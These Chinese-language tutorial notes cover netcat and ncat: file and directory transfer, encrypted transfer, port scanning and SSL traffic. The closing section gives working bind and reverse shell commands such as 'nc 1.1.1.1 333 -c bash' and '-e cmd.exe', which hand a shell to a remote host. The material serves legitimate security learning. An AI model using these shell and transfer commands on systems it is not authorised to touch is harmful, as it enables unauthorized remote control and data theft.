nc
常⽤⼯具
• 经常使⽤且功能强⼤
• 安全从业者必不可少的帮⼿
• Nc / ncat
• Wireshark
• Tcpdump
nc -lvp
使用nc 监听特定的端口
nc -nv ip port 连接特定ip下的指定端口
NETCAT ——NC
• ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧
• 侦听模式 / 传输模式
• telnet / 获取banner信息
• 传输⽂本信息
• 传输⽂件/⺫录
• 加密传输⽂件
• 远程控制/⽊⻢
• 加密所有流量
• 流媒体服务器
• 远程克隆硬盘
root@kali:/home/kali/Desktop# service ssh start
root@kali:/home/kali/Desktop# service apache2 start
NC——传输⽂本信息
• A:nc -l -p 4444
• B:nc –nv 1.1.1.1 4444
• 远程电⼦取证信息收集
NC——传输⽂件/目录
传输⽂件
• A:nc -lp 333 > 1.mp4
• B:nc -nv 1.1.1.1 333 < 1.mp4 –q 1
• 或
• A:nc -q 1 -lp 333 < a.mp4
• B: nc -nv 1.1.1.1 333 > 2.mp4
• 传输⺫录
• A:tar -cvf - music/ | nc -lp 333 –q 1
• B:nc -nv 1.1.1.1 333 | tar -xvf –
• 加密传⽂件
• A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
• B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
传输文件:
A:nc –lvp 12345 <1.txt
B:nc –nv 1.1.1.1 12345 > 1.txt
A方法
kali linux 监听特定端口 等待客户端主动携带数据 将接收到的数据保存写入特定文件
b方法
此时 windows 监听端 不会自动断开tcp连接
传输目录
a方法
传输目录:
A: tar -cvf - ./ | nc -lvp 12345
B:nc –nv 1.1.1.1 12345 > ./ 3.zip
b方法
A: tar -cvf - ./ | nc -nv 192.168.226.146 666
B: >ncat.exe -lvp 666 -i 3 > .\new_2.zip
tar –tf 1.zip
使用-i参数可以设置在完成传输后睡眠多少秒后断开
传输文件 完成后 并不自动端口
断开
B方法
NC——端⼝扫描
• nc -nvz 1.1.1.1 1-65535
• nc –vnzu 1.1.1.1 1-1024
NC——NCAT Nc缺乏加密和⾝份验证的能⼒
• Ncat包含于nmap⼯具包中
• A:cat new_pow.ps1 | nc -nv 192.168.226.146 999 --ssl -i 3
• B:ncat -nv 1.1.1.1 333 --ssl
直接使用–ssl 命令
实现加密
WIRESHARK——实践 抓包对⽐nc、ncat加密与不加密的流量
• 抓包对⽐nc、ncat加密与不加密的流量
直接使用–ssl 命令
实现加密
cat new_pow.ps1 | nc -nv 192.168.226.146 999 --ssl -i 3
NC——远程控制 反弹shell
• 正向:
• A:nc -lp 333 -c bash
• B:nc 1.1.1.1 333
• 反向:
• A:nc -lp 333
• B:nc 1.1.1.1 333 -c bash
• 注:Windows⽤户把bash改成cmd;
-c /bin/bash 将linux端的权限交出
-e cmd.exe 将win端权限交出